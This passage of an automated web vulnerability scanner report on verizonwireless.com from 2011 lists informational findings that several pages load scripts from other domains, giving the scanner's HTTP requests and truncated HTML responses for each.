Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.58. http://www.verizonwireless.com/b2c/&hec=6&lid=//hp//p//100+Trade+In//Imp&hid=0.9608070966787636 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=6&lid=//hp//p//100+Trade+In//Imp&hid=0.9608070966787636

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=6&lid=//hp//p//100+Trade+In//Imp&hid=0.9608070966787636 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:24 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.59. http://www.verizonwireless.com/b2c/&hec=7&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.20118952100165188 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=7&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.20118952100165188

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=7&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.20118952100165188 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:28 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.60. http://www.verizonwireless.com/b2c/&hec=8&lid=//hp//p//Deals+Central//Imp&hid=0.22915508295409381 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=8&lid=//hp//p//Deals+Central//Imp&hid=0.22915508295409381

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=8&lid=//hp//p//Deals+Central//Imp&hid=0.22915508295409381 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.61. http://www.verizonwireless.com/b2c/&hec=9&lid=//hp//p//Back+To+School//Imp&hid=0.48359646485187113 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=9&lid=//hp//p//Back+To+School//Imp&hid=0.48359646485187113

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=9&lid=//hp//p//Back+To+School//Imp&hid=0.48359646485187113 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:36 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.62. http://www.verizonwireless.com/b2c/CoverageLocatorController previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/CoverageLocatorController

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js

Request

GET /b2c/CoverageLocatorController HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:06 GMT
Pragma: no-cache
Content-Length: 12187
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.63. http://www.verizonwireless.com/b2c/aboutUs/affiliate/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/aboutUs/affiliate/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/aboutUs/affiliate/index.jsp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:07 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 13457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

               <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.64. http://www.verizonwireless.com/b2c/deviceFinder/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/deviceFinder/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js

Request

GET /b2c/deviceFinder/index.jsp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:07 GMT
Pragma: no-cache
